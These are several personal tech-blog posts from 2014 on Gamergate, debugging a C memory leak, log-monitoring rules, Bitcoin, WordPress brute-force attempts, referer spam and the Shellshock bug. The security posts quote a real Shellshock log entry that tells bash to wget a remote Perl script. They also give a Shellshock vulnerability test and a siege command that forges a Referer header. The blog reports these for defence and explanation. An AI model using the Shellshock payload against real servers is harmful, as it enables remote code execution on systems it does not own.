Gamergate

Your JoeDog hasn’t weighed in on Gamergate largely because he’s not a gamer. Unfortunately, it’s become too big to ignore. If you write about technology you’re almost required to have an opinion. So here’s an opinion: some guys are a bag of dicks.

Whoa, hold on.  First of all, what is Gamergate?

As far as I can tell, it began with an accusation. Well, first it began with a game, then an accusation.

Zoe Quinn released Depression Quest, an unusual game that caused a stir in the community. It’s a saga in which you follow the tribulations of a person going through depression. What makes it particularly unusual is this: nobody goes postal with an AR-15. Some liked it while others thought it wasn’t a game at all. To them it was some sort of interactive story. So Gamergate began as an esoteric argument about the nature of gaming. It might have stayed that way if not for that accusation.

In August Zoe Quinn’s boyfriend posted a lengthy indictment in which he claimed she cheated on him with several guys inside the gaming industry. She did this, Angry Ex-boyfriend said, in order to get ahead in the industry. He named a writer from Kotaku, which is part of the Gawker network. What makes this writer especially loathsome to Angry Ex-boyfriend is a penchant for red pants. (Full disclosure: Your JoeDog has a pair of red pants). Well if Zoe slept with Red Pants to get ahead,  then she failed in that regard. It doesn’t appear that Depression Quest was ever mentioned on that site.

It didn’t matter. After the charge was made, social media lit up in a shit storm. Under the guise of a debate on journalistic ethics, things turned nasty. Quinn’s personal information was published online. So were nude photos. She became the target of personal attacks. But it didn’t stop there. The war expanded and more women inside the industry were threatened. The FBI is taking the matter seriously. Gamergate became another front in the Culture War.

On one side we have traditional gamers who love blowing shit up while getting virtually blown. On the other we have newcomers who like the challenge of gaming but don’t care for the industry’s violence and misogynism. Breitbart added its voice in the beginning of September. Feminists, in their eyes, were wrecking the gaming industry. The nature of gaming had morphed into rightards vs. libtards on another front.

Your JoeDog is basically sick of this shit. Disagreements are one thing but threats are another. We can no longer face challenges because half the world is convinced the other half is evil. The women who’ve become the focus of gamer scorn have been forced into hiding due to personal threats. That’s not dialog, that’s terrorism. And if that’s your preferred tactic, then you’re pretty much a bag of dicks.

 

 

Posted in Community | Leave a comment



Memory Leaks

Your JoeDog loves C but he hates memory management. That’s why he writes objects in C. They make managing memory easier. Still, he’s been know to cause a memory leak or two … okay, maybe a few more than that.

Valgrind is supposed to help identify those fsckers. You run a program inside valgrind and it checks your memory utilization. Awesome! Except when it’s not.

Your JoeDog has had zero point zero luck with valgrind. He’s been working on a snippet that will be incorporated into Your Fido. Your JoeDog loves snippets. By reducing complexity they allow him to focus on the integrity of the new code. In this particular snippet, he placed the new functionality inside a loop to check its long-running performance. The damn thing leaked!

“How did you know it was leaking?”

“I watched its memory usage in top and it continued to expand.”

“Well that sucks.”

“Indeed.”

So Your JoeDog ran the program in valgrind like this:

valgrind -v --leak-check=full --tool=memcheck ./haha

After it completed its iterations, valgrind had this to say:

==21112== HEAP SUMMARY:
==21112== in use at exit: 0 bytes in 0 blocks
==21112== total heap usage: 0 allocs, 0 frees, 0 bytes allocated
==21112==
==21112== All heap blocks were freed -- no leaks are possible

What the hell? This thing was leaking all over the place. Now Your JoeDog may have done something stupid. Instead of memory leaks, he might have created memory hogs. “What are memory hogs?” They are allocated resources that are no longer used but with references that are still maintained. Valgrind won’t identify a memory hog as a memory leak. But this was a snippet and an audit was easy. There were no hogs; something was leaking.

After an extensive audit, Your JoeDog identified the leak. It wasn’t in the snippet. He was using a dynamic array from array.c Here’s the offending code:

ARRAY
array_destroy(ARRAY this) 
{
  int i;

  for (i = 0; i < this->length; i++) {
    xfree(this->data[i]);  
  } 
  xfree(this->data);
  this = NULL;
  return this; 
}

Your JoeDog freed everything but the array object itself. Here’s the fix:

ARRAY
array_destroy(ARRAY this) 
{
  int i;

  for (i = 0; i < this->length; i++) {
    xfree(this->data[i]);  
  } 
  xfree(this->data);
  xfree(this);
  this = NULL;
  return this; 
}

It’s not clear why valgrind didn’t identify that. Any thoughts?

 

Posted in C, Programming | Leave a comment



New Features For Fido

There’s rumors on the Internets. “Oh, really? What do they say?” They claim your posting frequency affects Google’s crawling frequency. The more you update, the more often it crawls.

Your JoeDog wanted to scrutinize this hypothesis. He wanted to monitor his logs and compare Google’s crawl rate against his web site updates.

So he added this rule to fido.conf

/var/log/httpd/joedog-access_log {
 rules = Googlebot
 action = /home/jeff/bin/googler
}

With that config he produced this document: google.txt

“J!!!!!!!!” Funk shouted in IRC. “You need to verify Googlebot”

“You mean a lot people forge that User-agent?”

“I’ll bet forty percent is forged.”

“D’oh!”

Fido can’t validate an IP address, nor do I want it to. Still, it needs a new feature, namely the ability to interact with its action script. Your JoeDog will add support for regex capture to his rules. This will allow you to capture part of the match and send that text to your action script.

“I have no idea what you just said.”

Okay, let’s modify the rule above with its intended implementation:

/var/log/httpd/joedog-access_log {
 rules = ([0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+).*Googlebot
 action = /home/jeff/bin/googler
}

The parentheses are highlighted in red because they represent the proposed feature.

On a match, fido will capture everything inside the parentheses and send it as argument 1 to the googler script. In this case it will be an IP address which googler can then verify as one that belongs to Google. If you have multiple captures, fido will send them as space separated arguments, i.e.,  /home/jeff/bin/googler  173.240.11.11 GET /index.php

For a sh script, $1 = 173.240.11.11, $2 = GET and $3 = /index.php

If all I wanted to do was solve this problem, I’d just write a script that parses the logs. However, I think this will be a valuable feature that will allow fido more flexibility to solve all the world’s problems.

Posted in Uncategorized | Leave a comment



Bitcoin Bust

Your JoeDog hasn’t spent much time blogging about Bitcoin but it does interest him for two reasons: 1.) He studied economics in college and 2.) The rogue currency has a technology/Internets angle. From an economics perspective, a successful currency must provide a medium of exchange and serve as a reasonably stable store of value. Bitcoin certainly provided the former but the latter was always in doubt.

And doubt won. Since its peak, Bitcoin has lost two-thirds of its value. Its bust was obviously not without victims. From Izabella Kaminska, we hear the story of one of those victims. Redditor Whattodobtc appears to have impoverished himself with bad bets on Bitcoins.  Izabella claims, “Some extremely wealthy libertarians have a lot to answer for if these sorts of ppl lose all due to believing in them.” Your JoeDog is certainly no libertarian but he feels the burden of risks should be placed on those who take them.

Certainly there have been influential libertarians who’ve been pushing Bitcoin as a hedge against fiat money. And if people like Whattodobtc better understood currency, they’d be less inclined to go long on a Libertarian pipe dream. But is this any different than the hucksters who shilled gold as a hedge against non-existent hyper-inflation? If you believed Glenn Beck back in 2012 and sunk your savings in gold, you lost 36% of your investment. That’s not as depressing as Whattodobtc’s story but it’s equally devoid of a happy ending.

Whattodobtc posted to Reddit because he wanted advice. Should he sell or weather the storm? He should have posted a similar inquiry before he sunk his savings in Bitcoin. Personally, I’d sell now before all I had left were some worthless binary numbers.

Posted in Uncategorized | 1 Comment



Another WordPress Attack

Your JoeDog was viewing his usage stats this morning and … well, see if anything stands out:

daily_usage_201410

There was a 94% increase in traffic yesterday. Was your JoeDog slashdotted? There was no hint that slashdot or any other site sent additional viewers this way. The vast majority of traffic arrived by direct request. “What does that mean, a direct request?” It means somebody typed “www.joedog.org” in the URL field of their browser. “So eighty-one thousand people decided to type “www.joedog.org” in their browsers? That seems unlikely.” That’s what Your JoeDog thought.

The usage report revealed another interesting fact. Eighty-one thousand requests were made from a single IP address: 173.245.50.137. The next most active IP address made 97% fewer requests. That’s interesting. Let’s see was Mr. 173.245.50.137 was doing on this site, shall we?

$ egrep 173.245.50.137 joedog-access_log
173.245.50.137 - - [04/Oct/2014:17:59:48 -0400] "POST /wp-login.php HTTP/1.1" 403 214 "-" "-"
173.245.50.137 - - [04/Oct/2014:17:59:48 -0400] "POST /wp-login.php HTTP/1.1" 403 214 "-" "-"
173.245.50.137 - - [04/Oct/2014:17:59:48 -0400] "POST /wp-login.php HTTP/1.1" 403 214 "-" "-"

He — you know it was a he — was making POST requests to the WordPress login page.  In other words, he was running a dictionary attack against the site. This attack persisted for four hours. For each of those requests, apache responded with HTTP-403. “What does HTTP-403 mean?” It means “Forbidden.” Thanks to a dictionary attack defense Your JoeDog documented in June 2013, the attacker never reached the login page. He was thwarted by an apache rule.

Why did a futile attack persist so long?

It was probably launched by malware on a zombie computer. Given the expected number of failures, the program was probably designed to report successes, not denials. So even though its assault was futile, the zombie diligently ran through its entire list of credentials.

When this happens to you — and it will happen to you, don’t get too upset. It’s not personal. These guys are running these attacks on any site they can find. Your site just happened to be in IPv4 address space.

[JoeDog: How To Stop A WordPress Dictionary Attack]

 

 

Posted in Security | Leave a comment



The Cyberattack on JPMorgan Chase

From today’s New York Times:

“It was a huge surprise that they were able to compromise a huge bank like JPMorgan,” said Al Pascual, a security analyst with Javelin Strategy and Research. “It scared the pants off many people.”

Honestly, this is only surprising to people who don’t work in large organizations. Large companies are filled with aging hardware kept alive beyond lifecycle. These servers host applications that are too important to kill but not important enough to port to newer architecture. Your JoeDog has seen servers that nobody owns. “What’s that do?” I don’t know. The guy who administered it retired five years ago.

The easiest way to circumvent millions of dollars in network security devices is with malware. Let’s say — and why not? — there’s a 0.001 chance that somebody falls for malware click bait. If your company has 100 employees, chances are less that 1 you’ll be malwared. But in a company of 10,000 people, ten mother fsckers are going to click that link.

Large corporations have been instrumental in driving down programming costs. While they may have a few senior developers on staff, most of the grunt work takes place overseas. Now Your JoeDog is not disparaging overseas developers. There are many fine programmers the world over. And the good ones all cost the same: lots o’ money. Large corporations don’t want those guys. They can find them in the US. They want cheap ones.

True story: Your JoeDog was kept abreast of the details of an outsourcing operation. When the initial quotes came back from India, there was much surprise. “This isn’t going to work, you guys cost more than our own people.” Well, the Indians said, we have another team in Bumfsck, India. They cost one-fifth as much as the Bangalore team. “Really? We’ll take it.”

The breach at JPMorgan Chase came in through the web servers. We don’t know where that was coded but Your JoeDog has his hunch. At some point a decision maker at JPMorgan was quoted the cost of Bumfsck coders and said, “Really? We’ll take it.”

 

 

 

Posted in Security | Leave a comment



Referer Spammers

The Internets are full of spam. Maybe you’ve noticed?

It’s in your inbox, in your comments and scattered throughout your web forums. Every spammer is a bag of dicks but the worst bottom feeder on the Internets is the referer spammer.

If you’ve never administered a website, then you’ve probably never heard of referer spam. Yeah, what is that?  Glad you asked. These dregs send requests to your web site with a fabricated referer that points to a site they want to advertise. Ideally, they’ll send requests to a site that publishes its traffic reports. When their URL makes the report, they get a free link back to their site.

Sites that publish their usage reports are easy to find. Put this in the Google Machine and see what pops up: “Top * Total Search Strings” This is what we’re looking for: Usage Stats: Top Referers.  Your JoeDog can get himself on that report by doing this:

Bully $ siege -H "Referer: http://www.joedog.org/" -g http://www.pickart.at/
HEAD / HTTP/1.0
Host: www.pickart.at
Accept: */*
User-Agent: Mozilla/5.0 (unknown-x86_64-linux-gnu) Siege/3.0.8
Referer: http://www.joedog.org/
Connection: close
HTTP/1.1 200 OK
Date: Fri, 03 Oct 2014 17:53:38 GMT
Server: Apache
Connection: close
Content-Type: text/html

Now if he’s really intent on making that report, he’ll repeat that request a few hundred times and place himself at number two on the chart. But here’s the thing: Referer Spammers will spam your logs even if you don’t publish your reports. They’ll go to all that trouble just to lure webmasters to their esoteric fetish sites.

So what can you do to prevent this stuff? Mostly you can decrease their incentive.

  1. Put your usage stats inside a password protected area
  2. Add a robots.txt with a bot exclusion rule so search engines don’t index it.
  3. Add a nofollow directive inside every link, again so engines don’t index them

I guarantee you’ll still get the stuff. They’ll send faked referrals just to capture the attention of the site’s administrators but at least you won’t award them with a boost to their Page Rank.

NOTE: Yes, Your JoeDog spelled Referrer with only two r’s. Most humans use three. Phillip Hallam-Baker is not most humans. He was the first guy to miss an ‘r’ in the original HTTP specification. I say, “first guy” because hundreds of eyeballs viewed that document and none of them noticed the misspelling. By the time it became RFC1945, “Referer” was set in stone. It would have been easier to change the world’s English-language dictionaries at that point….

Posted in Apache, Applications, Security | Leave a comment



So Are You Vulnerable To Shell-shock?

Here’s a quick command line test to see if you’re vulnerable to shell-shock, the bash vulnerability that everyone — I mean everyone — is talking about:

$ env x='() { :;}; echo 1. env' bash -c "echo 2. bash"

If your bash is vulnerable, it will execute the echo command inside the environment, if it’s not vulnerable, then it will only execute the stuff after -c

A vulnerable system prints this:

$ env x='() { :;}; echo 1. env' bash -c "echo 2. bash"
1. env
2. bash

A non-vulnerable system prints this:

$ env x='() { :;}; echo 1. env' bash -c "echo 2. bash"
2. bash

On the vulnerable system, the echo command that is set in the environment is executed by bash when the shell is invoked:

env x='() { :;}; echo 1. env' bash -c "echo 2. bash"

The stuff in red should NOT be executed. That’s a bug; it needs to be fixed.

NOTE: The second command was run on the server that hosts this blog entry. You guys can quit trying, mmmkay?

 

Posted in Applications, Security, sh | Leave a comment



Siege 3.x.x On Ubuntu

Your JoeDog uses Ubuntu Linux on his laptop. A few years ago he was deep in siege development and he was caught without a working copy. “I wonder if … ” Your JoeDog thought, “I wonder if Ubuntu has it.” He ran ‘sudo apt-get install siege’ and there it was, ready for installation. The Big Boys were distributing his software and Your JoeDog was convinced that he was a Somebody.

If this happens to you, if a major vendor starts to distribute your software and you feel the need to tell people about it, take an opportunity to learn this lesson: nobody gives a shit. It’s a great feeling so you’ll probably ignore it. You’ll puff your chest and tell people, “Debian is distributing my software!” Instead of a pat on the back, you’ll hear “What’s Debian?” You’ll tell them and they’ll quickly change the subject. Trust the JoeDog on this one: nobody gives a shit. Your wife might give you a poorly acted, “That’s great, honey.” but at the end of the day, your software project excites people as much as your fantasy football team.

Now turn the clock up a few years. Yesterday Your JoeDog had an encounter with a with a compromised Mormon dating site. He wanted to see what software they were running so he ran ‘siege -g http://singlesaints.com/’ on his snazzy new System76 laptop. Turns out he didn’t have a copy. But wait a second: Ubuntu distributes siege, remember?

“What’s Ubuntu?” – See, I told you nobody cares.

When he went to run that command with Ubuntu’s siege he got this message: ‘siege: error while loading shared libraries: libssl.so.1.0.0: No such file or directory’

In recent days, our log aggregator has been telling us that many of you are googling ‘ubuntu siege libssl’ and it suddenly became clear why you were doing that. This nerdblogger decided to investigate the cause and document it here. As a diligent nerdblogger, he uninstalled siege in order to document the the problem from scratch. Funny thing. When he ran siege after the second install in order to capture the error message, there was no error message. Siege worked.

At this point all that is known is this:

  1. There appears to be a problem with siege on Ubuntu
  2. Here’s the error message: libssl.so.1.0.0: No such file of directory’
  3. libssl.so.1.0.0 was installed on the laptop in which this error was encountered
  4. After removing siege with ‘sudo apt-get remove siege’ and
  5. Reinstalling it with ‘sudo apt-get install siege’
  6. It worked.
  7. Your mileage will vary. If the problem persists you should post to the Ubuntu forums 

 

 

 

Posted in Uncategorized | Leave a comment



Incoming!!

I don’t know about you, but Your JoeDog is shell shocked. His logs are filled with stuff like this:

173.245.53.136 – – [25/Sep/2014:16:42:37 -0400] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.1″ 301 – “-” “() { :;}; /bin/bash -c \”/usr/bin/wget http://singlesaints.com/firefile/temp?h=joedog.org -O /tmp/a.pl\””

So what’s happening here? Basically, some asshole is trying to exploit last week’s widely publicized bash shell vulnerability to invoke wget and pull down a perl script named “a.pl”

First of all, Your JoeDog hates scripts with an extension to designate the language in which they were coded. The person running the script doesn’t care what language it runs under. The computer will read the sh-bang line (#!/bin/perl) and call the appropriate interpreter. What’s the point of adding .pl? When you attack JoeDog’s computers please do so without a file extension, mmmmkay?

Second of all, he’s not going to find wget. On Your JoeDog’s computer it was installed in /bin/wget. But don’t bother trying to invoke it from there either. In accordance with best practice, it was moved it to a non-standard location. (You should do that, too.)

So while many of us are annoyed with this vulnerability, security firms and tech news companies are peeing themselves with excitement.

Dice tells us about ThreatStream, a cyber intelligence firm who’ve released ShockPot, a shell-shock honey pot. You can set it up on an publicly accessible server and watch knuckleheads try to ‘sploit you. Sounds like somebody needs a hobby.

Dice downloaded the software package and set it up on Linode, a Linux hosting site. Within a few days, they were shell-shocked seven times. Instead of wasting their time with honey pots, they could come over here and tail Your JoeDog’s logs. He was attacked 18 times in the last eight hours.

NOTE: The script they tried to pull was hosted on singlesaints.com, a Mormon dating site located in Utah. Your JoeDog attempted to snag that file for examination and they blocked his request.

HTTP request sent, awaiting response... 403 Forbidden

Props to all the single Mormon nerds who helped fix that issue in a timely fashion.

 

 

Posted in Community, Security | Leave a comment



Recent Comments

  • Tim: For those who enjoy playing at home and are extra OCD … they’ll spot something wrong with this....
  • roshni: Hi jeff, I need your help regarding running urls in a file containing post directives. Could you please send...
  • Alle: In seige, what does the pink result mean?
  • Windows User: Nice collection of Perl modules. Thanks for sharing.
  • Jeff Fulmer: No idea. What do you see in the webserver’s logs?